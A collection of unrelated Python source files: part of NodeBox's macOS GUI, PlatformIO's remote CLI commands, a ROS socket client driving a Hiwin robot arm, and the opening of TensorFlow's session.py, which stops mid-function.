epsData = property(_get_epsData)
def _get_tiffData(self):
return self.image.TIFFRepresentation()
tiffData = property(_get_tiffData)
def _get_pngData(self):
return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSPNGFileType, None)
pngData = property(_get_pngData)
def _get_gifData(self):
return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSGIFFileType, None)
gifData = property(_get_gifData)
def _get_jpegData(self):
return NSBitmapImageRep.imageRepWithData_(self.tiffData).representationUsingType_properties_(NSJPEGFileType, None)
jpegData = property(_get_jpegData)
def _get_image(self):
if self.canvas is not None:
self._updateImage()
return self._image
else:
return NSImage.alloc().initWithSize_(self.bounds[1])
image = property(_get_image)
def mouseDown_(self, event):
self.mousedown = True
def mouseUp_(self, event):
self.mousedown = False
def keyDown_(self, event):
self.keydown = True
self.key = event.characters()
self.keycode = event.keyCode()
def keyUp_(self, event):
self.keydown = False
self.key = event.characters()
self.keycode = event.keyCode()
def scrollWheel_(self, event):
self.scrollwheel = True
self.wheeldelta = event.deltaY()
def canBecomeKeyView(self):
return True
def acceptsFirstResponder(self):
return True
class NodeBoxAppDelegate(NibClassBuilder.AutoBaseClass):
def awakeFromNib(self):
self._prefsController = None
libDir = os.path.join(os.getenv("HOME"), "Library", "Application Support", "NodeBox")
try:
if not os.path.exists(libDir):
os.mkdir(libDir)
f = open(os.path.join(libDir, "README"), "w")
f.write("In this directory, you can put Python libraries to make them available to your scripts.\n")
f.close()
except OSError: pass
except IOError: pass
def showPreferencesPanel_(self, sender):
if self._prefsController is None:
from nodebox.gui.mac.preferences import NodeBoxPreferencesController
self._prefsController = NodeBoxPreferencesController.alloc().init()
self._prefsController.showWindow_(sender)
def generateCode_(self, sender):
"""Generate a piece of NodeBox code using OttoBot"""
from nodebox.util.ottobot import genProgram
controller = NSDocumentController.sharedDocumentController()
doc = controller.newDocument_(sender)
doc = controller.currentDocument()
doc.textView.setString_(genProgram())
doc.runScript_()
def showSite_(self, sender):
url = NSURL.URLWithString_("http://nodebox.net/")
NSWorkspace.sharedWorkspace().openURL_(url)
|
remote.py | # Copyright (c) 2014-present PlatformIO <contact@platformio.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import sys
import threading
from tempfile import mkdtemp
from time import sleep
import click
from platformio import exception, fs
from platformio.commands.device import helpers as device_helpers
from platformio.commands.device.command import device_monitor as cmd_device_monitor
from platformio.managers.core import pioplus_call
from platformio.project.exception import NotPlatformIOProjectError
# pylint: disable=unused-argument
@click.group("remote", short_help="PIO Remote")
@click.option("-a", "--agent", multiple=True)
def cli(**kwargs):
pass
@cli.group("agent", short_help="Start new agent or list active")
def remote_agent():
pass
@remote_agent.command("start", short_help="Start agent")
@click.option("-n", "--name")
@click.option("-s", "--share", multiple=True, metavar="E-MAIL")
@click.option(
"-d",
"--working-dir",
envvar="PLATFORMIO_REMOTE_AGENT_DIR",
type=click.Path(file_okay=False, dir_okay=True, writable=True, resolve_path=True),
)
def remote_agent_start(**kwargs):
pioplus_call(sys.argv[1:])
@remote_agent.command("reload", short_help="Reload agents")
def remote_agent_reload():
pioplus_call(sys.argv[1:])
@remote_agent.command("list", short_help="List active agents")
def remote_agent_list():
pioplus_call(sys.argv[1:])
@cli.command("update", short_help="Update installed Platforms, Packages and Libraries")
@click.option(
"-c",
"--only-check",
is_flag=True,
help="DEPRECATED. Please use `--dry-run` instead",
)
@click.option(
"--dry-run", is_flag=True, help="Do not update, only check for the new versions"
)
def remote_update(only_check, dry_run):
pioplus_call(sys.argv[1:])
@cli.command("run", short_help="Process project environments remotely")
@click.option("-e", "--environment", multiple=True)
@click.option("-t", "--target", multiple=True)
@click.option("--upload-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=True, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("--disable-auto-clean", is_flag=True)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("-s", "--silent", is_flag=True)
@click.option("-v", "--verbose", is_flag=True)
def remote_run(**kwargs):
pioplus_call(sys.argv[1:])
@cli.command("test", short_help="Remote Unit Testing")
@click.option("--environment", "-e", multiple=True, metavar="<environment>")
@click.option("--ignore", "-i", multiple=True, metavar="<pattern>")
@click.option("--upload-port")
@click.option("--test-port")
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(
exists=True, file_okay=False, dir_okay=True, writable=True, resolve_path=True
),
)
@click.option("-r", "--force-remote", is_flag=True)
@click.option("--without-building", is_flag=True)
@click.option("--without-uploading", is_flag=True)
@click.option("--verbose", "-v", is_flag=True)
def remote_test(**kwargs):
pioplus_call(sys.argv[1:])
@cli.group("device", short_help="Monitor remote device or list existing")
def remote_device():
pass
@remote_device.command("list", short_help="List remote devices")
@click.option("--json-output", is_flag=True)
def device_list(json_output):
pioplus_call(sys.argv[1:])
@remote_device.command("monitor", short_help="Monitor remote device")
@click.option("--port", "-p", help="Port, a number or a device name")
@click.option("--baud", "-b", type=int, help="Set baud rate, default=9600")
@click.option(
"--parity",
default="N",
type=click.Choice(["N", "E", "O", "S", "M"]),
help="Set parity, default=N",
)
@click.option("--rtscts", is_flag=True, help="Enable RTS/CTS flow control, default=Off")
@click.option(
"--xonxoff", is_flag=True, help="Enable software flow control, default=Off"
)
@click.option(
"--rts", default=None, type=click.IntRange(0, 1), help="Set initial RTS line state"
)
@click.option(
"--dtr", default=None, type=click.IntRange(0, 1), help="Set initial DTR line state"
)
@click.option("--echo", is_flag=True, help="Enable local echo, default=Off")
@click.option(
"--encoding",
default="UTF-8",
help="Set the encoding for the serial port (e.g. hexlify, "
"Latin1, UTF-8), default: UTF-8",
)
@click.option("--filter", "-f", multiple=True, help="Add text transformation")
@click.option(
"--eol",
default="CRLF",
type=click.Choice(["CR", "LF", "CRLF"]),
help="End of line mode, default=CRLF",
)
@click.option("--raw", is_flag=True, help="Do not apply any encodings/transformations")
@click.option(
"--exit-char",
type=int,
default=3,
help="ASCII code of special character that is used to exit "
"the application, default=3 (Ctrl+C)",
)
@click.option(
"--menu-char",
type=int,
default=20,
help="ASCII code of special character that is used to "
"control miniterm (menu), default=20 (DEC)",
)
@click.option(
"--quiet",
is_flag=True,
help="Diagnostics: suppress non-error messages, default=Off",
)
@click.option(
"-d",
"--project-dir",
default=os.getcwd,
type=click.Path(exists=True, file_okay=False, dir_okay=True, resolve_path=True),
)
@click.option(
"-e",
"--environment",
help="Load configuration from `platformio.ini` and specified environment",
)
@click.pass_context
def device_monitor(ctx, **kwargs):
project_options = {}
try:
with fs.cd(kwargs["project_dir"]):
project_options = device_helpers.get_project_options(kwargs["environment"])
kwargs = device_helpers.apply_project_monitor_options(kwargs, project_options)
except NotPlatformIOProjectError:
pass
kwargs["baud"] = kwargs["baud"] or 9600
def _tx_target(sock_dir):
pioplus_argv = ["remote", "device", "monitor"]
pioplus_argv.extend(device_helpers.options_to_argv(kwargs, project_options))
pioplus_argv.extend(["--sock", sock_dir])
try:
pioplus_call(pioplus_argv)
except exception.ReturnErrorCode:
pass
sock_dir = mkdtemp(suffix="pioplus")
sock_file = os.path.join(sock_dir, "sock")
try:
t = threading.Thread(target=_tx_target, args=(sock_dir,))
t.start()
while t.is_alive() and not os.path.isfile(sock_file):
sleep(0.1)
if not t.is_alive():
return
with open(sock_file) as fp:
kwargs["port"] = fp.read()
ctx.invoke(cmd_device_monitor, **kwargs)
t.join(2)
finally:
fs.rmtree(sock_dir)
|
Hiwin_RT605_ArmCommand_Socket_20190627173531.py | #!/usr/bin/env python3
# license removed for brevity
import rospy
import os
import numpy as np
from std_msgs.msg import String
from ROS_Socket.srv import *
from ROS_Socket.msg import *
from std_msgs.msg import Int32MultiArray
import math
import enum
pos_feedback_times = 0
mode_feedback_times = 0
msg_feedback = 1
#接收策略端命令 用Socket傳輸至控制端電腦
import socket
##多執行序
import threading
import time
import sys
import matplotlib as plot
import HiwinRA605_socket_TCPcmd as TCP
import HiwinRA605_socket_Taskcmd as Taskcmd
Socket = 0
data = '0' #設定傳輸資料初始值
Arm_feedback = 1 #假設手臂忙碌
NAME = 'socket_server'
##------------class pos-------
class point():
def __init__(self, x, y, z, pitch, roll, yaw):
self.x = x
self.y = y
self.z = z
self.pitch = pitch
self.roll = roll
self.yaw = yaw
pos = point(0.0,36.8,11.35,-90.0,0.0,0.0)
##------------class socket_cmd---------
class socket_data():
def __init__(self, grip, setvel, ra, delay, setboth, action,Speedmode):
self.grip = grip
self.setvel = setvel
self.ra = ra
self.delay = delay
self.setboth = setboth
self.action = action
self.Speedmode = Speedmode
socket_cmd = socket_data(0,0.0,0,0,0,0,0)
##-----------switch define------------##
class switch(object):
def __init__(self, value):
self.value = value
self.fall = False
def __iter__(self):
"""Return the match method once, then stop"""
yield self.match
raise StopIteration
def match(self, *args):
"""Indicate whether or not to enter a case suite"""
if self.fall or not args:
return True
elif self.value in args: # changed for v1.5, see below
self.fall = True
return True
else:
return False
##-----------client feedback arm state----------
class StateFeedback():
def __init__(self,ArmState,SentFlag):
self.ArmState = ArmState
self.SentFlag = SentFlag
state_feedback = StateFeedback(0,0)
def point_data(x,y,z,pitch,roll,yaw): ##接收策略端傳送位姿資料
pos.x = '%s'%x
pos.y = '%s'%y
pos.z = '%s'%z
pos.pitch = '%s'%pitch
pos.roll = '%s'%roll
pos.yaw = '%s'%yaw
##----------Arm Mode-------------###
def Arm_Mode(action,grip,ra,setvel,setboth): ##接收策略端傳送手臂模式資料
global arm_mode_flag
socket_cmd.action = int('%s'%action)
socket_cmd.grip = int('%s'%grip)
socket_cmd.ra = int('%s'%ra)
socket_cmd.setvel = int('%s'%setvel)
socket_cmd.setboth = int('%s'%setboth)
arm_mode_flag = True
print("sssss:",socket_cmd.action)
Socket_command()
##-------Arm Speed Mode------------###
def Speed_Mode(speedmode): ##接收策略端傳送手臂模式資料
global speed_mode_flag
socket_cmd.Speedmode = speedmode
# def Grip_Mode(req): ##接收策略端傳送夾爪動作資料
# socket_cmd.grip = int('%s'%req.grip)
# return(1)
def socket_talker(): ##創建Server node
pub = rospy.Publisher('chatter', Int32MultiArray, queue_size=10)
rospy.init_node(NAME)
rate = rospy.Rate(10) # 10hz
print ("Ready to connect")
while not rospy.is_shutdown():
# hello_str = "hello world %s" % rospy.get_time()
state = Int32MultiArray()
state.data = [state_feedback.ArmState,state_feedback.SentFlag]
# rospy.loginfo(state)
pub.publish(state)
rate.sleep()
# a = rospy.Service('arm_mode',arm_mode, Arm_Mode) ##server arm mode data
# s = rospy.Service('arm_pos',arm_data, point_data) ##server arm point data
# b = rospy.Service('speed_mode',speed_mode, Speed_Mode) ##server speed mode data
#c = rospy.Service('grip_mode',grip_mode, Grip_Mode) ##server grip mode data
#print ("Ready to connect")
#rospy.spin() ## spin one
##------------server 端 end-------
##----------socket 封包傳輸--------------##
##---------------socket 傳輸手臂命令-----------------
def Socket_command():
global Socket,arm_mode_flag
if arm_mode_flag == True:
arm_mode_flag = False
for case in switch(socket_cmd.action):
#-------PtP Mode--------
if case(Taskcmd.Action_Type.PtoP):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetPtoP(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
print("ptp---------")
break
break
#-------Line Mode--------
if case(Taskcmd.Action_Type.Line):
for case in switch(socket_cmd.setboth):
if case(Taskcmd.Ctrl_Mode.CTRL_POS):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_POS,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel)
break
if case(Taskcmd.Ctrl_Mode.CTRL_EULER):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_EULER,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
if case(Taskcmd.Ctrl_Mode.CTRL_BOTH):
data = TCP.SetLine(socket_cmd.grip,Taskcmd.RA.ABS,Taskcmd.Ctrl_Mode.CTRL_BOTH,pos.x,pos.y,pos.z,pos.pitch,pos.roll,pos.yaw,socket_cmd.setvel )
break
break
#-------設定手臂速度--------
if case(Taskcmd.Action_Type.SetVel):
data = TCP.SetVel(socket_cmd.grip, socket_cmd.setvel)
break
#-------設定手臂Delay時間--------
if case(Taskcmd.Action_Type.Delay):
data = TCP.SetDelay(socket_cmd.grip,0)
break
#-------設定手臂急速&安全模式--------
if case(Taskcmd.Action_Type.Mode):
data = TCP.Set_SpeedMode(socket_cmd.grip,socket_cmd.Speedmode)
break
socket_cmd.action= 5 ##切換初始mode狀態
Socket.send(data.encode('utf-8'))#socket傳送for python to translate str
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##-----------socket client--------
def socket_client():
global Socket
try:
Socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
Socket.connect(('192.168.0.1', 8080))#iclab 5 & iclab hiwin
#s.connect(('192.168.1.102', 8080))#iclab computerx
except socket.error as msg:
print(msg)
sys.exit(1)
print('Connection has been successful')
print(Socket.recv(1024))
while 1:
feedback_str = Socket.recv(1024)
#手臂端傳送手臂狀態
if str(feedback_str[2]) == '48':# F 手臂為Ready狀態準備接收下一個運動指令
state_feedback.ArmState = 0
# Arm_feedback = 0
# socket_client_arm_state(Arm_feedback)
#print("isbusy false")
if str(feedback_str[2]) == '49':# T 手臂為忙碌狀態無法執行下一個運動指令
state_feedback.ArmState = 1
# Arm_feedback = 1
# socket_client_arm_state(Arm_feedback)
#print("isbusy true")
if str(feedback_str[2]) == '54':# 6 策略完成
state_feedback.ArmState = 6
# Arm_feedback = 6
# socket_client_arm_state(Arm_feedback)
print("shutdown")
#確認傳送旗標
if str(feedback_str[4]) == '48':#回傳0 false
state_feedback.SentFlag = 0
# Socket_sent_flag = False
# socket_client_sent_flag(Socket_sent_flag)
if str(feedback_str[4]) == '49':#回傳1 true
state_feedback.SentFlag = 1
# Socket_sent_flag = True
# socket_client_sent_flag(Socket_sent_flag)
##---------------socket 傳輸手臂命令 end-----------------
if Arm_feedback == Taskcmd.Arm_feedback_Type.shutdown:
break
rospy.on_shutdown(myhook)
Socket.close()
##-----------socket client end--------
##-------------socket 封包傳輸 end--------------##
## 多執行緒
def thread_test():
socket_client()
## 多執行序 end
def myhook():
print ("shutdown time!")
if __name__ == '__main__':
socket_cmd.action = 5##切換初始mode狀態
t = threading.Thread(target=thread_test)
t.start() # 開啟多執行緒
try:
socket_talker()
except rospy.ROSInterruptException:
pass
t.join() |
session.py | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""A client interface for TensorFlow."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import collections
import functools
import re
import threading
import warnings
import numpy as np
import wrapt
from tensorflow.core.protobuf import config_pb2
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.client import pywrap_tf_session as tf_session
from tensorflow.python.eager import context
from tensorflow.python.eager import monitoring
from tensorflow.python.framework import device
from tensorflow.python.framework import error_interpolation
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import session_ops
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training.experimental import mixed_precision_global_state
from tensorflow.python.util import compat
from tensorflow.python.util import nest
from tensorflow.python.util.compat import collections_abc
from tensorflow.python.util.tf_export import tf_export
_python_session_create_counter = monitoring.Counter(
'/tensorflow/api/python/session_create_counter',
'Counter for number of sessions created in Python.')
class SessionInterface(object):
"""Base class for implementations of TensorFlow client sessions."""
@property
def graph(self):
"""The underlying TensorFlow graph, to be used in building Operations."""
raise NotImplementedError('graph')
@property
def sess_str(self):
"""The TensorFlow process to which this session will connect."""
raise NotImplementedError('sess_str')
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations in the session. See `BaseSession.run()` for details."""
raise NotImplementedError('run')
def partial_run_setup(self, fetches, feeds=None):
"""Sets up the feeds and fetches for partial runs in the session."""
raise NotImplementedError('partial_run_setup')
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with additional feeds and fetches."""
raise NotImplementedError('partial_run')
def _get_indexed_slices_value_from_fetches(fetched_vals):
return ops.IndexedSlicesValue(
fetched_vals[0], fetched_vals[1],
fetched_vals[2] if len(fetched_vals) == 3 else None)
def _get_feeds_for_indexed_slices(feed, feed_val):
return list(
zip([feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape], feed_val))
# List of extensions supported to convert run arguments into actual fetches and
# feeds.
#
# Each element in the list is a tuple of (Type, fetch_fn, feed_fn1, feed_fn2),
# where the function signatures are:
# fetch_fn : Type -> (list of Tensors,
# lambda: list of fetched np.ndarray -> TypeVal)
# feed_fn1 : Type, TypeVal -> list of (Tensor, value)
# feed_fn2 : Type -> list of Tensors
#
# `fetch_fn` describes how to expand fetch into its
# component Tensors and how to contract the fetched results back into
# a single return value.
#
# Each feed function describes how to unpack a single fed value and map it to
# feeds of one or more tensors and their corresponding values: `feed_fn1` is
# used to feed a run, `feed_fn2` to set up a partial run.
#
# TODO(touts): We could reimplement these as specialized _FeedMapper
# implementations after we refactor the feed handling code to use them.
#
# Eventually, this registration could be opened up to support custom Tensor
# expansions.
# pylint: disable=g-long-lambda
_REGISTERED_EXPANSIONS = [
# SparseTensors are fetched as SparseTensorValues. They can be fed
# SparseTensorValues or normal tuples.
(sparse_tensor.SparseTensor, lambda fetch: ([
fetch.indices, fetch.values, fetch.dense_shape
], lambda fetched_vals: sparse_tensor.SparseTensorValue(*fetched_vals)),
lambda feed, feed_val: list(
zip([feed.indices, feed.values, feed.dense_shape], feed_val)),
lambda feed: [feed.indices, feed.values, feed.dense_shape]),
# IndexedSlices are fetched as IndexedSlicesValues. They can be fed
# IndexedSlicesValues or normal tuples.
(ops.IndexedSlices,
lambda fetch: ([fetch.values, fetch.indices] if fetch.dense_shape is None
else [fetch.values, fetch.indices, fetch.dense_shape
], _get_indexed_slices_value_from_fetches),
_get_feeds_for_indexed_slices,
lambda feed: [feed.values, feed.indices] if feed.dense_shape is None else
[feed.values, feed.indices, feed.dense_shape]),
# The default catches all other types and performs no expansions.
(object, lambda fetch: ([fetch], lambda fetched_vals: fetched_vals[0]),
lambda feed, feed_val: [(feed, feed_val)], lambda feed: [feed])
]
# pylint: enable=g-long-lambda
def _convert_to_numpy_obj(numpy_dtype, obj):
"""Explicitly convert obj based on numpy type except for string type."""
return numpy_dtype(obj) if numpy_dtype is not object else str(obj)
def register_session_run_conversion_functions(
tensor_type,
fetch_function,
feed_function=None,
feed_function_for_partial_run=None):
"""Register fetch and feed conversion functions for `tf.Session.run()`.
This function registers a triple of conversion functions for fetching and/or
feeding values of user-defined types in a call to tf.Session.run().
An example
```python
class SquaredTensor(object):
def __init__(self, tensor):
self.sq = tf.square(tensor)
#you can define conversion functions as follows:
fetch_function = lambda squared_tensor:([squared_tensor.sq],
lambda val: val[0])
feed_function = lambda feed, feed_val: [(feed.sq, feed_val)]
feed_function_for_partial_run = lambda feed: [feed.sq]
#then after invoking this register function, you can use as follows:
session.run(squared_tensor1,
feed_dict = {squared_tensor2 : some_numpy_array})
```
Args:
tensor_type: The type for which you want to register a conversion function.
fetch_function: A callable that takes an object of type `tensor_type` and
returns a tuple, where the first element is a list of `tf.Tensor` objects,
and the second element is a callable that takes a list of ndarrays and
returns an object of some value type that corresponds to `tensor_type`.
fetch_function describes how to expand fetch into its component Tensors
and how to contract the fetched results back into a single return value.
feed_function: A callable that takes feed_key and feed_value as input, and
returns a list of tuples (feed_tensor, feed_val), feed_key must have type
`tensor_type`, and feed_tensor must have type `tf.Tensor`. Each feed
function describes how to unpack a single fed value and map it to feeds of
one or more tensors and their corresponding values.
feed_function_for_partial_run: A callable for specifying tensor values to
feed when setting up a partial run, which takes a `tensor_type` type
object as input, and returns a list of Tensors.
Raises:
ValueError: If `tensor_type` has already been registered.
"""
for conversion_function in _REGISTERED_EXPANSIONS:
if issubclass(conversion_function[0], tensor_type):
raise ValueError('%s has already been registered so ignore it.' %
tensor_type)
_REGISTERED_EXPANSIONS.insert(0, (tensor_type, fetch_function, feed_function,
feed_function_for_partial_run))
def _is_attrs_instance(obj):
"""Returns True if the given obj is an instance of attrs-decorated class."""
return getattr(obj.__class__, '__attrs_attrs__', None) is not None
def _get_attrs_values(obj):
"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = {}
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(id(f))
if j is None:
j = len(seen_fetches)
seen_fetches[id(f)] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
if isinstance(fetches, wrapt.ObjectProxy):
self._fetch_type = type(fetches.__wrapped__)
else:
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
if isinstance(fetches, collections.defaultdict):
self._type_ctor = functools.partial(collections.defaultdict,
fetches.default_factory)
else:
self._type_ctor = self._fetch_type
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
def _generator():
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
yield k, m.build_results([values[j] for j in vi])
return self._type_ctor(_generator())
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = feed_handles or {}
self._ops = []
self._fetch_handles = {}
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch.ref()] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x.ref() not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
